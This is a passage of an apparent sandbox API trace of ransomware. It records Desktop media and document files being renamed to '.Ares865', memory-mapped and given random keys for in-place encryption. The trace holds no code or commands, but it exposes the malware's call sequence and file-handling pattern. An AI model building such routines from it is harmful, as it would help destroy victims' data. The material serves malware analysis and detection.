(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pchqc7yd_ gx.mkv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.198] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=14837) returned 1 [0107.198] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.199] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.199] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.199] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3d00, lpName=0x0) returned 0x124 [0107.199] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3d00) returned 0x190000 [0107.200] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.201] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.201] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.202] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\s_llCj921RTJj.mkv.Ares865") returned 63 [0107.202] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\s_llCj921RTJj.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\s_llcj921rtjj.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\s_llCj921RTJj.mkv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\s_llcj921rtjj.mkv.ares865"), dwFlags=0x1) returned 1 [0107.204] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\s_llCj921RTJj.mkv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\s_llcj921rtjj.mkv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.204] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=43208) returned 1 [0107.204] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.205] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.205] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.205] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xabd0, lpName=0x0) returned 0x124 [0107.205] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xabd0) returned 0x190000 [0107.207] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.207] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.207] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.214] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vAIw2ony.xlsx.Ares865") returned 59 [0107.214] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vAIw2ony.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vaiw2ony.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vAIw2ony.xlsx.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vaiw2ony.xlsx.ares865"), dwFlags=0x1) returned 1 [0107.216] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vAIw2ony.xlsx.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vaiw2ony.xlsx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.216] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=36433) returned 1 [0107.216] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.217] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.217] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.217] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x9160, lpName=0x0) returned 0x124 [0107.217] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9160) returned 0x190000 [0107.219] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.219] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.219] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.221] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\W8jkGk1Vmd8rjZ.gif.Ares865") returned 64 [0107.221] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\W8jkGk1Vmd8rjZ.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\w8jkgk1vmd8rjz.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\W8jkGk1Vmd8rjZ.gif.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\w8jkgk1vmd8rjz.gif.ares865"), dwFlags=0x1) returned 1 [0107.224] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\W8jkGk1Vmd8rjZ.gif.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\w8jkgk1vmd8rjz.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.224] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=25910) returned 1 [0107.224] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.225] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.225] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.225] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6840, lpName=0x0) returned 0x124 [0107.225] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6840) returned 0x190000 [0107.226] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.227] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.227] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.229] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ySd3fkTmN.m4a.Ares865") returned 59 [0107.229] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ySd3fkTmN.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ysd3fktmn.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ySd3fkTmN.m4a.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ysd3fktmn.m4a.ares865"), dwFlags=0x1) returned 1 [0107.233] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ySd3fkTmN.m4a.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ysd3fktmn.m4a.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.233] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=35479) returned 1 [0107.234] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.235] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.236] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.236] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8da0, lpName=0x0) returned 0x124 [0107.236] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8da0) returned 0x190000 [0107.237] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.238] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.238] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.239] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zR84HhqeSmu.mp3.Ares865") returned 61 [0107.239] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zR84HhqeSmu.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zr84hhqesmu.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zR84HhqeSmu.mp3.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zr84hhqesmu.mp3.ares865"), dwFlags=0x1) returned 1 [0107.241] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zR84HhqeSmu.mp3.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zr84hhqesmu.mp3.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.241] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1139) returned 1 [0107.241] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.242] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.242] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.242] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x780, lpName=0x0) returned 0x124 [0107.242] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x780) returned 0x190000 [0107.242] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.243] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.243] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.244] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zrA4gg_U3I7qcYwB.gif.Ares865") returned 66 [0107.244] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zrA4gg_U3I7qcYwB.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zra4gg_u3i7qcywb.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zrA4gg_U3I7qcYwB.gif.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zra4gg_u3i7qcywb.gif.ares865"), dwFlags=0x1) returned 1 [0107.246] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zrA4gg_U3I7qcYwB.gif.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zra4gg_u3i7qcywb.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.246] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=73468) returned 1 [0107.246] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.247] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.247] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.247] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x12200, lpName=0x0) returned 0x124 [0107.247] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12200) returned 0x190000 [0107.250] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.250] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.250] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.253] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TUhfjYAIMEhE_9FnZNyx", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TUhfjYAIMEhE_9FnZNyx") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TUhfjYAIMEhE_9FnZNyx" [0107.253] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TUhfjYAIMEhE_9FnZNyx\\2 zVZ75eRuNalR1V.mp3.Ares865") returned 87 [0107.253] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TUhfjYAIMEhE_9FnZNyx\\2 zVZ75eRuNalR1V.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tuhfjyaimehe_9fnznyx\\2 zvz75erunalr1v.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TUhfjYAIMEhE_9FnZNyx\\2 zVZ75eRuNalR1V.mp3.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tuhfjyaimehe_9fnznyx\\2 zvz75erunalr1v.mp3.ares865"), dwFlags=0x1) returned 1 [0107.255] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TUhfjYAIMEhE_9FnZNyx\\2 zVZ75eRuNalR1V.mp3.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tuhfjyaimehe_9fnznyx\\2 zvz75erunalr1v.mp3.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.255] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=50590) returned 1 [0107.255] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.256] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.256] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.256] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc8a0, lpName=0x0) returned 0x124 [0107.256] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc8a0) returned 0x190000 [0107.257] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.258] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.258] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.260] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TUhfjYAIMEhE_9FnZNyx\\3HjEND1hTaAK4Fuo9a.mp4.Ares865") returned 89 [0107.260] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TUhfjYAIMEhE_9FnZNyx\\3HjEND1hTaAK4Fuo9a.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tuhfjyaimehe_9fnznyx\\3hjend1htaak4fuo9a.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TUhfjYAIMEhE_9FnZNyx\\3HjEND1hTaAK4Fuo9a.mp4.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tuhfjyaimehe_9fnznyx\\3hjend1htaak4fuo9a.mp4.ares865"), dwFlags=0x1) returned 1 [0107.262] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TUhfjYAIMEhE_9FnZNyx\\3HjEND1hTaAK4Fuo9a.mp4.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tuhfjyaimehe_9fnznyx\\3hjend1htaak4fuo9a.mp4.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.262] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=90443) returned 1 [0107.263] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.263] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.263] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.264] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x16450, lpName=0x0) returned 0x124 [0107.264] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16450) returned 0x190000 [0107.266] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.267] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.267] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.270] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TUhfjYAIMEhE_9FnZNyx\\EbcafUmB1PT.swf.Ares865") returned 82 [0107.270] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TUhfjYAIMEhE_9FnZNyx\\EbcafUmB1PT.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tuhfjyaimehe_9fnznyx\\ebcafumb1pt.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TUhfjYAIMEhE_9FnZNyx\\EbcafUmB1PT.swf.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tuhfjyaimehe_9fnznyx\\ebcafumb1pt.swf.ares865"), dwFlags=0x1) returned 1 [0107.280] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TUhfjYAIMEhE_9FnZNyx\\EbcafUmB1PT.swf.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tuhfjyaimehe_9fnznyx\\ebcafumb1pt.swf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.280] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=37704) returned 1 [0107.280] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.281] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.281] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.281] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x9650, lpName=0x0) returned 0x124 [0107.281] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9650) returned 0x190000 [0107.282] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.283] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.283] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.285] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TUhfjYAIMEhE_9FnZNyx\\QanWhg4S.jpg.Ares865") returned 79 [0107.285] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TUhfjYAIMEhE_9FnZNyx\\QanWhg4S.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tuhfjyaimehe_9fnznyx\\qanwhg4s.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TUhfjYAIMEhE_9FnZNyx\\QanWhg4S.jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tuhfjyaimehe_9fnznyx\\qanwhg4s.jpg.ares865"), dwFlags=0x1) returned 1 [0107.286] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TUhfjYAIMEhE_9FnZNyx\\QanWhg4S.jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tuhfjyaimehe_9fnznyx\\qanwhg4s.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0107.286] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6968) returned 1 [0107.286] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0107.287] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0107.287] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.287] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1e40, lpName=0x0) returned 0x124 [0107.287] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1e40) returned 0x190000 [0107.288] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0107.289] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0107.289] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0107.291] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TUhfjYAIMEhE_9FnZNyx\\Qgbqc1HcsyWD.flv.Ares865") returned 83 [0107.291] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TUhfjYAIMEhE_9FnZNyx\\Qgbqc1HcsyWD.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tuhfjyaimehe_9fnznyx\\qgbqc1hcsywd.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TUhfjYAIMEhE_9FnZNyx\\Qgbqc1HcsyWD.flv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js 